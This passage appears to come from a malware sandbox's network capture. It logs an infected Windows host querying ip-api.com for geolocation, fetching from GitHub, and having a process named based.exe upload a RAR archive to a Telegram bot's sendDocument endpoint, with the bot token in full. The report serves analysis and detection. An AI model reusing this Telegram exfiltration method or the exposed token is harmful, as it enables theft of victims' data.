Jun 5, 2024 03:56:41.031260014 CEST	396	IN	Data Raw: ed 7b 4b a7 51 ef ec 4d 93 f8 83 4c 39 b1 e2 f5 4a b9 97 40 b2 e2 af 41 45 6e fe ca bb 78 1f 5e ff b7 3d a5 34 8e cb e8 f4 ee ad 0c bb bc 7a 6a f1 24 49 d8 2a 3f 4d 0b ed 5d 77 01 0a cd 95 df 2d 3f 83 3a c0 38 36 1a de c5 56 95 88 9d 42 cd b3 43 Data Ascii: {KQML9J@AEnx^=4zj$I*?M]w-?:86VBCA$Z<YKx)wnvFc^e-'LgMuOG'[lYT=:v(R"5:4x>%uvfOIoAS9

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.4	49750	208.95.112.1	80

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 03:56:42.013809919 CEST	65	OUT	GET /json/ HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jun 5, 2024 03:56:42.602694988 CEST	468	IN	HTTP/1.1 200 OK Date: Wed, 05 Jun 2024 01:56:41 GMT Content-Type: application/json; charset=utf-8 Content-Length: 291 Access-Control-Allow-Origin: * X-Ttl: 45 X-Rl: 43 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 58 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 22 7a 69 70 22 3a 22 37 36 35 34 39 22 2c 22 6c 61 74 22 3a 33 31 2e 30 30 36 35 2c 22 6c 6f 6e 22 3a 2d 39 37 2e 38 34 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 69 73 70 22 3a 22 51 75 61 64 72 61 4e 65 74 22 2c 22 6f 72 67 22 3a 22 4f 4d 47 49 54 53 46 41 53 54 22 2c 22 61 73 22 3a 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"TX","regionName":"Texas","city":"Killeen","zip":"76549","lat":31.0065,"lon":-97.8406,"timezone":"America/Chicago","isp":"QuadraNet","org":"OMGITSFAST","as":"AS8100 QuadraNet Enterprises LLC","query":"173.254.250.91"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49752	208.95.112.1	80	7840	C:\ProgramData\Microsoft\based.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 03:56:42.581944942 CEST	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.1
Jun 5, 2024 03:56:43.200323105 CEST	375	IN	HTTP/1.1 200 OK Date: Wed, 05 Jun 2024 01:56:42 GMT Content-Type: application/json; charset=utf-8 Content-Length: 198 Access-Control-Allow-Origin: * X-Ttl: 44 X-Rl: 42 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 72 65 76 65 72 73 65 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 2e 73 74 61 74 69 63 2e 71 75 61 64 72 61 6e 65 74 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"Texas","timezone":"America/Chicago","reverse":"173.254.250.91.static.quadranet.com","mobile":false,"proxy":false,"query":"173.254.250.91"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.4	49757	216.58.212.132	80

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 03:56:49.629136086 CEST	149	OUT	GET / HTTP/1.1 Host: www.google.com User-Agent: python-requests/2.28.1 Accept-Encoding: gzip, deflate, br Accept: / Connection: keep-alive
Jun 5, 2024 03:56:50.806344032 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 05 Jun 2024 01:56:50 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=ISO-8859-1 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-An7JMPqZmmjywSuMTUczRw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 8484 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-06-05-01; expires=Fri, 05-Jul-2024 01:56:50 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=AQTF6HzDL0BjW3Zk2wmBbdU3MXAt8fPxQQ_WnQ8i5rULsv9QOgDG3Z4FQg; expires=Mon, 02-Dec-2024 01:56:50 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=514=R5bSnjClrfCueKu9bBCrQU33sXXP7jjcqJXzSJxURWqdaL2SrYCiBQ6QVuVhx1R_rSRrRove5W9Ea1vEKV1XsDKi_sc9RelRnnT_sBssk2RlIy-C-OOJEfWykK7Szx6S7gJMeJDEy3KzSKkkt97Qr70E2jNK-vvRR8-omBVKiaA; expires=Thu, 05-Dec-2024 01:56:50 GMT; path=/; domain=.google.com; HttpOnly Data Raw: 1f 8b 08 00 00 00 00 00 02 ff cd 7c 7b 7b db b6 d2 e7 ff f9 14 34 b3 47 11 1f d3 12 49 dd 25 d3 5e c7 71 2e 3d 49 93 c6 69 4f 5b d7 eb 17 24 21 89 31 2f 32 49 d9 56 6c 7d f7 fd 0d c0 9b 64 a5 ed db dd 67 9f 4d 1b 9b 04 06 83 b9 61 30 33 00 73 b8 e7 c5 6e b6 5a 70 65 9e 85 c1 d1 21 fd 54 fc 8c 87 a9 1b 2f b8 ad aa e2 85 00 6c 75 Data Ascii: \|{{4GI%^q.=IiO[$!1/2IVl}dgMa03snZpe!T/lu
Jun 5, 2024 03:56:50.806404114 CEST	212	IN	Data Raw: 9e 65 8b 71 bb 9d ba 73 1e b2 56 9c cc da ff e1 ce 27 36 e3 aa 12 b0 68 66 ab 3c 52 81 81 33 ef e8 30 e4 19 53 dc 38 ca 78 94 d9 ea 39 67 89 3b 57 b2 39 57 ee e2 24 f0 5e a4 8a 1f 4d e3 24 64 99 1f 47 3a 5e dc 60 e9 f9 d1 4c b9 e3 ce 02 18 53 b4 Data Ascii: eqsV'6hf<R30S8x9g;W9W$^M$dG:^`LS8UX)a&geh,PeJ+s,UT>{fJZ_$\&-UX= m8R&ggmDq,IyfPUHxf
Jun 5, 2024 03:56:50.806441069 CEST	1236	IN	Data Raw: da ea a9 04 3f f8 02 b1 3e 41 d1 96 8c b7 9d 04 2c 83 c2 f6 4c f0 3b 6b 9b f7 c5 e3 55 9a a1 8f 25 de 95 1b 07 71 72 65 5a 43 6f d1 5a 44 33 a9 ad 45 12 2f 6c 55 a0 01 f6 cc cf 02 7e 24 85 76 d8 96 6f 87 92 4f 25 8a 23 17 cc 9c 44 83 1f 3e 7c ba Data Ascii: ?>A,L;kU%qreZCoZD3E/lU~$voO%#D>\|=~\|5%i4[(W3E7eF}f'~~CzF39n>gav,;#>;]wLcNQ-tzgn;FQz
Jun 5, 2024 03:56:50.806477070 CEST	1236	IN	Data Raw: 34 86 ae 05 4b 10 4e fc 18 7b 7c 92 f3 e3 3c 3e 86 eb 72 92 9b 8d 49 6c a2 e6 ef cf 14 fc d5 54 d5 3c 09 cd d3 fe 5f 32 76 f4 5b 19 4f 33 b4 34 1a 22 9a 4c c7 aa 5d ca 2b 88 5d 11 0e b6 10 bf 64 31 22 1b 50 93 0b 2c c4 73 f9 d8 3c 4b 12 d0 ad 32 Data Ascii: 4KN{\|<>rIlT<_2v[O34"L]+]d1"P,s<K2UL!M1gA3ZA[?+)_Kvr`6o Nhz`}~1`092p5*,Sa27/oewM}4kjd F!Tk0{
Jun 5, 2024 03:56:50.806509018 CEST	1236	IN	Data Raw: 30 95 74 ea eb 02 84 46 8e 4d a2 f8 09 df 04 95 e6 00 83 9d 00 5e fa e0 f9 e9 22 60 ab b1 1f 09 8e 9c f8 7e b2 dd 84 a8 f4 3a b7 26 21 1e 43 e9 56 e6 45 46 33 c6 fb da 8f 16 cb 6c 43 11 7e 34 c7 34 99 94 bf c3 dc eb 59 12 c3 82 c6 cf a7 d3 e9 a4 Data Ascii: 0tFM^"`~:&!CVEF3lC~44YcmRxNa5%t69:P=/G!X$_-fq6NGS6a,= bi0\|`zV":F9GF.-i$.Y^#v{0,U5
Jun 5, 2024 03:56:50.806545019 CEST	1236	IN	Data Raw: 83 4d f5 e8 b7 78 f9 05 8d 7f 35 1e 1a de e0 44 8e 8f d4 a3 1f d1 f1 57 83 43 e6 07 9b 62 f0 83 1c 43 a8 1e bd a1 d7 bf 42 e1 25 08 c3 9e 12 10 ab 47 af a8 e7 e9 70 11 84 c9 1b 02 db f1 bd fa 17 da 8e b2 a0 cd a3 36 73 20 af f6 22 89 bd a5 9b a5 Data Ascii: Mx5DWCbCB%Gp6s "r9,ly!N0Hi$fOh46BJMC.X$4*I1wmlB/2p$G-1wr\|$I?O<YVdB-[f50s.#d{IY^0
Jun 5, 2024 03:56:50.806577921 CEST	1236	IN	Data Raw: 45 59 0b 47 54 e2 c6 8b d5 44 b1 0c ab ab 1c 28 4f a7 5b c4 70 bb 48 72 11 28 fb b7 cc 5d 81 d2 4f f2 49 04 c5 7f 3a 04 f2 09 89 b5 2f f4 5b d2 b7 a8 bc 58 11 5a fe 9f d6 91 5d 2f b6 8b d3 1d f0 a4 e7 47 7a dd ae b1 e3 16 59 51 6e f3 a3 88 27 ff Data Ascii: EYGTD(O[pHr(]OI:/[XZ]/GzYQn'!Hh{+&Ih:)TdTu)PvnB^ZTTThQ-h\k#OmQRV(6z+9[gTj&UX~m_\Z~(h47Onuq
Jun 5, 2024 03:56:50.806615114 CEST	138	IN	Data Raw: 2d 40 36 a5 b2 01 61 94 3c 02 fb 32 cd 43 ec 49 d2 74 f4 4a 45 74 47 c4 3e 30 2b 69 30 7b cf a8 2d 37 fa f0 21 5f 34 db f7 40 bf 8a ac 99 2e e4 21 43 2d 16 6f 53 fd f9 e5 af 6f df a9 f9 e9 f3 e7 ce 74 7e ed 14 6f 5f ce 7f 3f bb f1 c4 9b 70 3a 73 Data Ascii: -@6a<2CItJEtG>0+i0{-7!_4@.!C-oSot~o_?p:s>.b]uTpjm+W{I7r"O
Jun 5, 2024 03:56:50.806742907 CEST	1236	IN	Data Raw: 76 dd 65 65 d9 14 ee b2 61 36 1a 59 f3 1b 5d a6 f8 26 36 84 9d b0 82 3e 6d 43 b2 f6 72 c2 5b 57 af af be a6 74 05 7e 29 74 78 42 b7 81 4b 21 9e 42 31 27 8f 8f 4d 2c 2d 1d 3d 86 b6 7e b6 bb 8e 51 64 3d bb ed e5 6f d9 57 dd a4 16 a5 4d 09 3f b8 d7 Data Ascii: veea6Y]&6>mCr[Wt~)txBK!B1'M,-=~Qd=oWM?d6r"cS6]s/6?3p4odR}cs8TJ^&g(v\wnJV5Vuw147n>-At[97IIB#[)*e8w`
Jun 5, 2024 03:56:50.806778908 CEST	608	IN	Data Raw: 4d b2 8b 93 4b e4 b2 e3 cd d6 f2 70 02 a9 d1 31 fe da ce 58 1e 9e b6 64 01 82 be f8 a3 23 39 9e 02 fe 61 36 7e 90 0e c5 d1 91 38 4d fd d9 32 a1 93 6d fa 84 e0 2e f1 b3 e2 99 47 08 41 f3 1e 73 8d 4c 55 6b be d4 7b 3d 6d 92 a3 9e 26 9c 7f e3 c8 68 Data Ascii: MKp1Xd#9a6~8M2m.GAsLUk{=m&h&8;j7}p]*C~S0(0=/h\vn '(ehGbYZ_vK=aVIZ[:zgodWT

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.4	49766	208.95.112.1	80

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 03:56:57.538047075 CEST	65	OUT	GET /json/ HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jun 5, 2024 03:56:58.126766920 CEST	468	IN	HTTP/1.1 200 OK Date: Wed, 05 Jun 2024 01:56:57 GMT Content-Type: application/json; charset=utf-8 Content-Length: 291 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 58 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 22 7a 69 70 22 3a 22 37 36 35 34 39 22 2c 22 6c 61 74 22 3a 33 31 2e 30 30 36 35 2c 22 6c 6f 6e 22 3a 2d 39 37 2e 38 34 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 69 73 70 22 3a 22 51 75 61 64 72 61 4e 65 74 22 2c 22 6f 72 67 22 3a 22 4f 4d 47 49 54 53 46 41 53 54 22 2c 22 61 73 22 3a 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"TX","regionName":"Texas","city":"Killeen","zip":"76549","lat":31.0065,"lon":-97.8406,"timezone":"America/Chicago","isp":"QuadraNet","org":"OMGITSFAST","as":"AS8100 QuadraNet Enterprises LLC","query":"173.254.250.91"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.4	49775	216.58.212.132	80

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 03:57:06.678442955 CEST	149	OUT	GET / HTTP/1.1 Host: www.google.com User-Agent: python-requests/2.28.1 Accept-Encoding: gzip, deflate, br Accept: / Connection: keep-alive
Jun 5, 2024 03:57:07.569123030 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 05 Jun 2024 01:57:07 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=ISO-8859-1 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-b41Ni5nQpr_ukMwRTjeo6g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 8452 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: AEC=AQTF6HzwyDnnBZT3MJtaoyp0VqWUKf8HmHAKViz_1V-lJV09jizrkLvTcJc; expires=Mon, 02-Dec-2024 01:57:07 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=514=ZKVoyvXbDOkf_5MfAkgWqLQfedWI8bq4aK17jtJLDoFm3vZ0KRFwixFpemSL8gbUXVuvQYfVm1osSoyvy45AkkQhmZVEQ1OdyguLCxESezCWnQhNbtdlgzlWT5ZRVGREMKLnuTF5SHqSe1yCC0n1Yp149vsh8H1JXBY5yFEZUAQ; expires=Thu, 05-Dec-2024 01:57:07 GMT; path=/; domain=.google.com; HttpOnly Data Raw: 1f 8b 08 00 00 00 00 00 02 ff cd 7c 79 7b db 36 b3 ef ff f9 14 34 7b 5e 45 7c 4c 4b a4 f6 c5 b4 af e3 38 4b 4f b6 c6 e9 f2 d6 f5 f5 01 49 48 62 cc cd 24 65 5b b1 f5 dd ef 6f 00 6e 92 95 b6 a7 e7 3e f7 b9 69 63 93 c0 00 98 0d 83 99 c1 30 87 7b 6e e4 64 ab 98 2b 8b 2c f0 8f 0e e9 a7 e2 65 3c 48 9d 28 e6 96 aa 8a 17 02 b0 d4 45 96 c5 93 76 3b 75 16 3c 60 ad 28 99 b7 7f e5 f6 27 36 e7 aa e2 b3 70 6e a9 3c 54 31 03 67 ee d1 61 c0 33 a6 38 51 98 f1 30 b3 d4 73 ce 12 67 a1 64 0b ae dc 45 89 ef 3e 4f 15 2f 9c 45 49 c0 32 2f 0a 75 bc 38 fe d2 f5 c2 b9 72 c7 ed 18 33 a6 68 0b e4 ef 5b cf e5 51 aa b0 d0 55 82 28 e1 2d e5 75 14 cd 7d e0 cb 52 25 60 e1 4a 49 Data Ascii: \|y{64{^E\|LK8KOIHb$e[on>ic0{nd+,e<H(Ev;u<`('6pn<T1ga38Q0sgdE>O/EI2/u8r3h[QU(-u}R%`JI
Jun 5, 2024 03:57:07.569186926 CEST	1236	IN	Data Raw: 63 ee 78 cc 57 66 9c 65 cb 84 a7 4a 16 29 0b ee c7 ca 2a 5a 2a 33 0f e3 f8 3d 73 32 7f a5 dc 2d 58 46 ad cf 13 ae f8 51 74 4d 0b 02 8b 96 aa 84 2c 00 81 2e 4f 9d c4 8b 09 27 75 9b 84 30 8a dc 58 57 0a d0 24 b2 a3 2c 7d 02 95 f1 fb ac 4d 3c 9c 2a Data Ascii: cxWfeJ)Z3=s2-XFQtM,.O'u0XW$,}M<*%):1,[K=_'S%m;=}xfc{D~\p.'Qlby$PQg~Oqr~WQsFS{er5NF~az'v~
Jun 5, 2024 03:57:07.569195032 CEST	1236	IN	Data Raw: 09 87 53 10 2a b7 91 e7 2a c6 9e b5 89 7d a3 b1 bb bd 45 ec 68 34 76 b7 1f 3f 6d 9a 10 73 d6 53 c2 24 d0 43 eb e2 b2 c2 21 6e 32 ed 01 4e 46 93 3a ed 29 6b 34 9a 7b ac 35 e7 d9 49 96 25 9e bd cc f8 e3 e3 5e d3 b6 36 db 9a 2a f7 5c 55 d3 b4 a9 c6 Data Ascii: S*}Eh4v?msS$C!n2NF:)k4{5I%^6\U1Xl,b6%Ihxa:Q_~g$aYogiL>`b5DYm]Zj(TM=KzMtj6_}+oG
Jun 5, 2024 03:57:07.569427967 CEST	636	IN	Data Raw: 3c 9a 17 12 9e 40 45 94 11 fe 1a eb cc 7d 20 52 0f 72 9e b6 46 3c 00 9a cc b9 0a 94 ad 2e 13 fa b0 a6 c4 5c be 4a a1 26 1d 83 c4 ba 28 48 32 c7 83 a1 db 59 f3 40 a2 7b 27 07 db 91 ef e6 9a 40 94 4d 42 4a f0 f9 eb 96 9f 66 a5 38 fb a5 d4 7b e3 81 Data Ascii: <@E} RrF<.\J&(H2Y@{'@MBJf8{PtFNLnziEvt?nWzk`*"}2.L&o3zDlZjf#ep)l l`nusb:zP\kJmy>Z1GtRb7
Jun 5, 2024 03:57:07.569436073 CEST	1236	IN	Data Raw: fe a2 6d f1 d0 41 04 ff f3 e7 b7 a7 11 0e 9e 90 7c 1b e9 e3 a9 ed 3c 96 2b e2 38 11 e3 da 05 2b 10 ac 95 ae a7 c8 e5 83 b7 0e 45 8a 5f f9 7d 4c 71 6e 1d 14 dd 08 aa 44 37 a2 9e 78 5e ef 4d 43 8a 09 21 6a d1 28 84 ae ed 3f 53 1b 36 b6 42 de 64 df Data Ascii: mA\|<+8+E_}LqnD7x^MC!j(?S6Bdj$l2#3+NM<RcB`KymW%IMr0j]7_kyUbv)QZpS z0!hDRFwYSiY^
Jun 5, 2024 03:57:07.569446087 CEST	1163	IN	Data Raw: 32 c0 34 4f c3 db 5a 44 ad 2a 6c 49 37 80 41 4c f7 24 96 1a c1 09 29 c8 04 ca 54 8f 54 e8 ab 72 9e 4b 3f 60 f7 d2 cf 84 f0 8c de a8 e0 e8 0d 10 f2 be e1 a1 3f 54 0b f5 c1 d6 c8 91 ac e7 b1 88 1a 61 ca 2a fa 37 1b 28 e1 f0 94 62 bb c4 6c 0b a1 9c Data Ascii: 24OZDlI7AL$)TTrK?`?Ta7(blYr[/d~K2+{(8)$\|tW5,>9uXy`\.opQE[HkYpgN7zsmz)t''rL2<F=>qz7v'wvd
Jun 5, 2024 03:57:07.569689035 CEST	1236	IN	Data Raw: 9d fb ed f5 e9 ea c7 9b 17 f1 d9 e7 fb cf 2f 0e 06 8b b3 57 73 89 ec d7 f4 6f cb 29 47 f5 4f fe ec 10 44 f5 07 82 78 fa 67 5b 10 39 e7 37 68 f8 f5 f5 6f 3f f5 3e ae 5e fe f4 d2 ff f4 db c2 7b 1b 66 c3 5f 7e 5c 9d 67 ef 1d d0 c0 ef 9d 60 72 71 b9 Data Ascii: /Wso)GODxg[97ho?>^{f_~\g`rq*pk]AX7ZOhVj_-JB78KO-+.5df9dn<,S<\!^nt3yT8Dq: \|(UUyMefUu/Kd5]YP!xf
Jun 5, 2024 03:57:07.569832087 CEST	1236	IN	Data Raw: f1 67 44 9f 34 0e 8c d1 78 a4 9b 7d a3 77 59 52 f2 ea 2a 8b e6 10 44 9d 20 6c 99 5a 6b 26 c5 52 ee 62 0c 11 1e a2 ef 9f a6 69 d3 c1 81 f8 6c 47 24 fe d5 47 20 3e f3 27 86 ee de 4d 84 df ab 53 55 a3 7c 5a da 41 f1 74 17 8b 2a 44 fd 36 95 2d eb a7 Data Ascii: gD4x}wYRD lZk&RbilG$G >'MSU\|ZAtD6-?qce799=:;DF4?EL]nxOKfo,O.QoyZa`p~!UJ8<8'%\J4xuT5aPewC_A_N
Jun 5, 2024 03:57:07.569839954 CEST	255	IN	Data Raw: da 99 4c a0 04 79 61 cc d4 b5 ce d6 6f ac ff 94 18 cd 74 57 47 8c 27 be 15 a1 0f 5b ea 9c a0 6c 59 ed 03 54 06 d1 be d5 e4 99 d0 3b b4 de 14 f8 da 56 ff a8 f9 e6 a2 78 3f 30 2f 0f 6a 6f 3d 88 d4 3c eb d2 fc e2 93 f3 fa 37 f8 94 d4 d9 99 65 10 da Data Ascii: LyaotWG'[lYT;Vx?0/jo=<7ez<&LzZB/`N}5GA_S*M#c"W"\|eWb<;)AMJWhfy)/[;B~}z65@'?}:Re?

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.4	49785	208.95.112.1	80

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 03:57:14.647624969 CEST	65	OUT	GET /json/ HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jun 5, 2024 03:57:15.237062931 CEST	468	IN	HTTP/1.1 200 OK Date: Wed, 05 Jun 2024 01:57:14 GMT Content-Type: application/json; charset=utf-8 Content-Length: 291 Access-Control-Allow-Origin: * X-Ttl: 42 X-Rl: 43 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 58 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 22 7a 69 70 22 3a 22 37 36 35 34 39 22 2c 22 6c 61 74 22 3a 33 31 2e 30 30 36 35 2c 22 6c 6f 6e 22 3a 2d 39 37 2e 38 34 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 69 73 70 22 3a 22 51 75 61 64 72 61 4e 65 74 22 2c 22 6f 72 67 22 3a 22 4f 4d 47 49 54 53 46 41 53 54 22 2c 22 61 73 22 3a 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"TX","regionName":"Texas","city":"Killeen","zip":"76549","lat":31.0065,"lon":-97.8406,"timezone":"America/Chicago","isp":"QuadraNet","org":"OMGITSFAST","as":"AS8100 QuadraNet Enterprises LLC","query":"173.254.250.91"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49746	185.199.109.133	443	5064	C:\ProgramData\main.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:56:29 UTC	108	OUT	GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-06-05 01:56:29 UTC	803	IN	HTTP/1.1 404 Not Found Connection: close Content-Length: 14 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block Content-Type: text/plain; charset=utf-8 X-GitHub-Request-Id: 75CC:35BBD2:52803C:5BA726:665FC5CC Accept-Ranges: bytes Date: Wed, 05 Jun 2024 01:56:29 GMT Via: 1.1 varnish X-Served-By: cache-dfw-kdfw8210032-DFW X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1717552590.719037,VS0,VE51 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 28047bd42688dd2b3620861dd56f3b38dfd0a8f4 Expires: Wed, 05 Jun 2024 02:01:29 GMT Source-Age: 0
2024-06-05 01:56:29 UTC	14	IN	Data Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404: Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.4	49753	185.199.109.133	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:56:43 UTC	108	OUT	GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-06-05 01:56:43 UTC	802	IN	HTTP/1.1 404 Not Found Connection: close Content-Length: 14 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block Content-Type: text/plain; charset=utf-8 X-GitHub-Request-Id: 75CC:35BBD2:52803C:5BA726:665FC5CC Accept-Ranges: bytes Date: Wed, 05 Jun 2024 01:56:43 GMT Via: 1.1 varnish X-Served-By: cache-dfw-kdfw8210154-DFW X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1717552604.840955,VS0,VE1 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 4742bced582b85afb50d1846fe4da481dcf7d296 Expires: Wed, 05 Jun 2024 02:01:43 GMT Source-Age: 14
2024-06-05 01:56:43 UTC	14	IN	Data Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404: Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49754	149.154.167.220	443	7840	C:\ProgramData\Microsoft\based.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:56:44 UTC	266	OUT	POST /bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument HTTP/1.1 Host: api.telegram.org Accept-Encoding: identity Content-Length: 3572 User-Agent: python-urllib3/2.2.1 Content-Type: multipart/form-data; boundary=0b4ba1c968e585ef344eda942b799b23
2024-06-05 01:56:44 UTC	3572	OUT	Data Raw: 2d 2d 30 62 34 62 61 31 63 39 36 38 65 35 38 35 65 66 33 34 34 65 64 61 39 34 32 62 37 39 39 62 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 72 6f 6d 65 74 68 65 75 73 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 d5 0c 6b 50 21 04 00 00 01 0f 41 3e ef 3a 57 ce d5 f4 d7 95 5e 93 c0 a5 dd 9e 0a 55 e3 03 d8 1e 4e b0 24 c0 8a e2 fb 3b 7a 09 da 7f bb 98 90 7b b7 bb ad 61 b8 11 da ef 80 19 5c 8a b3 dd e1 56 99 9a 62 b4 6f 51 